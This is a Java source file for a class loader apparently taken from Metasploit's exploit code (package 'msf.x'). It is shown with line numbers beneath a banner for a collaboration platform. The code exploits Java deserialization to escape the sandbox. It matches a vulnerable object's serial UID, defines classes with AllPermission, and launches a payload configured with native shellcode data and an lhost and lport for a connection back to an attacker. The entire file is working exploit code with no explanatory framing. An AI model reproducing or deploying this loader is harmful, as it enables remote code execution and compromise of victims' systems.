Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
// This is heavily based off Fuller's Loader
2

3
package msf.x;
4

5
import java.io.ByteArrayOutputStream;
6
import java.io.IOException;
7
import java.io.InputStream;
8
import java.io.ObjectInputStream;
9
import java.io.ObjectOutputStream;
10
import java.io.Serializable;
11
import java.net.URL;
12
import java.security.AllPermission;
13
import java.security.CodeSource;
14
import java.security.Permissions;
15
import java.security.ProtectionDomain;
16
import java.security.cert.Certificate;
17
import java.lang.reflect.Field;
18

19
public class LoaderX extends ClassLoader implements Serializable
20
{
21
	// The serial UID must match that as set in the vulnerable serializedObject.
22
	private static final long serialVersionUID = 6812622870313961944L;
23

24
	public static LoaderX instance = null;
25

26
	private void writeObject( ObjectOutputStream oos ) throws IOException, ClassNotFoundException
27
	{
28
		oos.defaultWriteObject();
29
	}
30

31
	private void readObject( ObjectInputStream ois ) throws IOException, ClassNotFoundException
32
	{
33
		LoaderX.instance = this;
34
		
35
		ois.defaultReadObject();
36
	}
37

38
	public void bootstrapPayload( String data, String jar, String lhost, int lport ) throws IOException
39
	{
40
		String classNames[] = { "msf.x.PayloadX$StreamConnector", "msf.x.PayloadX" };
41
		String classPaths[] = { "/msf/x/PayloadX$StreamConnector.class", "/msf/x/PayloadX.class" };
42
		Class cls = null;
43
		
44
		try
45
		{
46
			for( int index=0 ; index<classNames.length ; index++ )
47
			{
48
				ByteArrayOutputStream bos = new ByteArrayOutputStream();
49
				byte[] buffer = new byte[8192];
50
				int length;
51
			
52
				// read in the class file from the jar
53
				InputStream is = getClass().getResourceAsStream( classPaths[index] );
54
				// and write it out to the byte array stream
55
				while( ( length = is.read( buffer ) ) > 0 )
56
					bos.write( buffer, 0, length );
57
				// convert it to a simple byte array
58
				buffer = bos.toByteArray();
59

60
				URL url = new URL( "file:///" );
61
				
62
				Certificate[] certs = new Certificate[0];
63

64
				Permissions perm = new Permissions();
65
				perm.add( new AllPermission() );
66
				
67
				ProtectionDomain pd = new ProtectionDomain( new CodeSource( url, certs ), perm );
68
				
69
				cls = defineClass( classNames[index], buffer, 0, buffer.length, pd );
70
			}
71
		
72
			// cls will end up being the PayloadX class
73
			if( cls != null )
74
			{
75
				// reflect into the PayloadX class to get these three fields
76
				Field payload_data  = cls.getField( "data" );
77
				Field payload_jar   = cls.getField( "jar" );
78
				Field payload_lhost = cls.getField( "lhost" );
79
				Field payload_lport = cls.getField( "lport" );
80
				
81
				// instantiate the PayloadX object once so as we can set the native payload data
82
				Object obj = cls.newInstance();
83
				
84
				// set the native payload data, lhost and lport
85
				payload_data.set( obj, data );
86
				payload_jar.set( obj, jar );
87
				payload_lhost.set( obj, lhost );
88
				payload_lport.setInt( obj, lport );
89
				
90
				// instantiate a second PayloadX object to perform the actual payload 
91
				obj = cls.newInstance();
92
			}
93
		}
94
		catch( Exception e ) {}
95
	}
96
}
97

98